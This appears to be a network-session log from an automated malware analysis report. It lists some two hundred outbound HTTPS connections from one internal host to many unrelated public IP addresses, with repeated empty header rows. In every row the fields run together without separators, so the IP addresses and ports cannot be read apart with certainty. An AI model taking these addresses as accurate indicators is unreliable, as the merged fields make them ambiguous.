                                      11871192.168.2.144119293.206.230.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11872192.168.2.145030867.164.20.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11873192.168.2.144850469.123.45.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11874192.168.2.143644688.228.167.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11875192.168.2.1446094143.171.22.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11876192.168.2.145757858.173.215.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11877192.168.2.1459740146.204.222.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11878192.168.2.145581843.158.58.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11879192.168.2.14421265.163.131.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11880192.168.2.145717062.115.200.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11881192.168.2.143499831.146.181.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11882192.168.2.144498438.239.55.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11883192.168.2.145479871.227.147.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11884192.168.2.1459272158.216.70.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11885192.168.2.1456950122.62.52.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11886192.168.2.1460210104.23.5.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11887192.168.2.1452460109.36.193.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11888192.168.2.1450578146.233.37.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11889192.168.2.144175814.97.166.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11890192.168.2.1449292151.209.180.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11891192.168.2.143491832.195.101.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11892192.168.2.1456530183.145.8.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11893192.168.2.143750095.104.135.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11894192.168.2.1447228203.58.153.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11895192.168.2.1446032103.240.216.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11896192.168.2.1439982184.122.192.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11897192.168.2.1447260194.184.78.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11898192.168.2.1441456193.0.214.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11899192.168.2.146028460.175.54.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11900192.168.2.143874269.148.93.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11901192.168.2.1438498117.186.105.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11902192.168.2.143722686.87.125.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11903192.168.2.1441006107.247.150.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11904192.168.2.144568646.72.89.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11905192.168.2.144853831.17.200.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11906192.168.2.145362067.77.137.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11907192.168.2.143957012.134.112.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11908192.168.2.1454134126.220.209.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11909192.168.2.1456762221.142.246.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11910192.168.2.1453592196.103.222.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11911192.168.2.1449656144.149.96.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11912192.168.2.1456704187.16.125.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11913192.168.2.1450606153.202.236.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11914192.168.2.1458504179.121.187.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11915192.168.2.1437004175.214.134.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11916192.168.2.1453780108.235.109.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11917192.168.2.1455952157.108.116.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11918192.168.2.1447092113.135.89.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11919192.168.2.1436830187.33.42.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11920192.168.2.146081852.125.218.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11921192.168.2.143631661.79.190.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11922192.168.2.143495467.155.2.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11923192.168.2.145568642.142.246.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11924192.168.2.1432888173.80.116.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11925192.168.2.1437142136.61.122.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11926192.168.2.1433370135.172.179.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11927192.168.2.145354688.30.118.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11928192.168.2.1437170174.137.248.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11929192.168.2.1444924186.59.116.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11930192.168.2.1456570174.216.18.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11931192.168.2.1459044194.2.18.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11932192.168.2.1453010167.143.154.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11933192.168.2.1460992139.48.55.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11934192.168.2.1460370187.101.210.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11935192.168.2.1442496191.193.243.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11936192.168.2.1440136154.105.5.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11937192.168.2.143909049.235.43.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11938192.168.2.14420725.181.79.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11939192.168.2.144657842.97.203.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11940192.168.2.143487685.95.224.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11941192.168.2.145784681.41.84.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11942192.168.2.1458700183.91.232.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11943192.168.2.145755468.148.210.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11944192.168.2.1434634123.9.201.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11945192.168.2.14518289.47.243.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11946192.168.2.143784294.26.50.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11947192.168.2.1452776181.25.11.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11948192.168.2.1449072116.121.139.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11949192.168.2.1446556197.37.249.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11950192.168.2.1437926123.172.229.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11951192.168.2.143900248.108.14.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11952192.168.2.145679468.38.107.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11953192.168.2.143619632.33.199.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11954192.168.2.1453552205.35.57.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11955192.168.2.1448530200.35.15.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11956192.168.2.1451000221.245.12.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11957192.168.2.1433616174.75.99.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11958192.168.2.144670285.162.109.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11959192.168.2.144009651.154.151.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11960192.168.2.1434330170.96.35.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11961192.168.2.1454602152.199.224.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11962192.168.2.1455462163.5.120.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11963192.168.2.1456858192.205.185.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11964192.168.2.1455450111.30.135.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11965192.168.2.1435524216.170.52.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11966192.168.2.1457150151.51.210.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11967192.168.2.1434372120.145.84.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11968192.168.2.144927651.109.123.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11969192.168.2.1442512141.224.96.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11970192.168.2.1453292116.168.83.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11971192.168.2.145845450.186.246.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11972192.168.2.1460796120.141.176.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11973192.168.2.144182650.115.125.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11974192.168.2.1439370182.26.147.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11975192.168.2.1454778110.207.236.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11976192.168.2.145634823.235.14.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11977192.168.2.145106872.188.34.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11978192.168.2.1457276133.253.150.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11979192.168.2.1452694213.167.131.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11980192.168.2.144632893.238.248.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11981192.168.2.1434582193.201.241.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11982192.168.2.1456154154.98.86.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11983192.168.2.1441666115.20.254.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11984192.168.2.1450822213.161.224.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11985192.168.2.1452850216.169.139.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11986192.168.2.1458664120.73.135.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11987192.168.2.1455364218.49.193.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11988192.168.2.1455608180.162.117.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11989192.168.2.1454236187.124.213.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11990192.168.2.1437852126.13.86.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11991192.168.2.1447308156.88.15.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11992192.168.2.1441372106.70.207.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11993192.168.2.1437206132.61.43.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11994192.168.2.1436964223.182.150.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11995192.168.2.1457422107.53.253.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11996192.168.2.144571419.162.39.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11997192.168.2.143767613.206.33.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11998192.168.2.1458814120.169.233.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11999192.168.2.145820891.206.91.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12000192.168.2.143754445.95.212.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12001192.168.2.1445190183.109.106.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12002192.168.2.144185898.124.6.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12003192.168.2.1455944205.94.55.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12004192.168.2.1434860100.217.80.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12005192.168.2.1439688181.25.201.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12006192.168.2.1448274202.63.154.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12007192.168.2.1451992138.164.75.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12008192.168.2.1447666223.82.32.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12009192.168.2.143614688.133.112.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12010192.168.2.1444474121.217.118.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12011192.168.2.145063218.57.24.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12012192.168.2.1441436130.216.91.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12013192.168.2.1438822201.151.185.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12014192.168.2.144622652.183.100.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12015192.168.2.144374679.194.40.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12016192.168.2.1446130166.118.243.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12017192.168.2.144031849.117.54.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12018192.168.2.1434698108.176.123.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12019192.168.2.1437618149.173.101.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12020192.168.2.1447256101.4.97.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12021192.168.2.1437076196.202.245.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12022192.168.2.143748697.104.53.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12023192.168.2.1437782206.160.32.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12024192.168.2.1441098108.225.186.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12025192.168.2.14492861.71.54.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12026192.168.2.143917635.128.243.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12027192.168.2.143734039.23.41.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12028192.168.2.1459244221.228.123.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12029192.168.2.1458496185.38.66.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12030192.168.2.144052413.41.86.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12031192.168.2.144992259.120.101.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12032192.168.2.1447372212.80.134.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12033192.168.2.1447640176.168.234.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12034192.168.2.145410017.235.234.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12035192.168.2.145438274.208.166.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12036192.168.2.144852069.212.47.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12037192.168.2.1448706154.45.161.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12038192.168.2.1451026141.213.141.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12039192.168.2.1447754190.232.213.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12040192.168.2.1446654178.152.93.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12041192.168.2.1441512106.70.172.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12042192.168.2.1451372104.151.21.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12043192.168.2.143734046.241.11.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12044192.168.2.1456224146.196.46.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12045192.168.2.1454262185.213.94.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12046192.168.2.145401244.123.175.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12047192.168.2.1457630155.198.120.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12048192.168.2.1436510156.33.232.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12049192.168.2.146058277.250.190.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12050192.168.2.143696683.163.148.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12051192.168.2.1435852116.146.44.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12052192.168.2.1448698168.100.183.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12053192.168.2.1439426162.132.238.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12054192.168.2.1452204124.221.71.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12055192.168.2.1459178165.187.140.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12056192.168.2.1439284157.11.1.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12057192.168.2.1443028216.12.189.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12058192.168.2.1454324106.141.5.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12059192.168.2.1442486201.3.83.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12060192.168.2.145595032.55.35.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12061192.168.2.143561280.207.115.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12062192.168.2.1432810141.200.231.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12063192.168.2.144648242.171.30.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12064192.168.2.1442238209.170.240.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12065192.168.2.1439666133.247.164.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12066192.168.2.145021047.56.210.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12067192.168.2.1438498207.44.198.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12068192.168.2.1434526212.104.231.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12069192.168.2.1446828171.18.109.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12070192.168.2.1453454105.173.240.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12071192.168.2.1455120207.15.9.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12072192.168.2.145857027.199.254.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12073192.168.2.145872251.51.162.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12074192.168.2.143958814.212.130.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12075192.168.2.1450070144.30.139.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12076192.168.2.1444786213.209.188.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12077192.168.2.145515019.112.116.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12078192.168.2.1447692168.45.244.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12079192.168.2.1442170138.73.30.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12080192.168.2.143605831.143.206.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12081192.168.2.1457046181.71.159.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12082192.168.2.1436556198.208.21.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12083192.168.2.1433326131.98.238.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12084192.168.2.143557817.103.187.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12085192.168.2.1447924207.41.62.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12086192.168.2.1447510187.43.222.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12087192.168.2.1446126102.219.106.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12088192.168.2.1448590147.160.184.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12089192.168.2.1435686196.131.169.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12090192.168.2.144791632.254.166.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12091192.168.2.1436222141.77.20.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12092192.168.2.1456538159.190.2.147443
                                      TimestampBytes transferredDirectionData


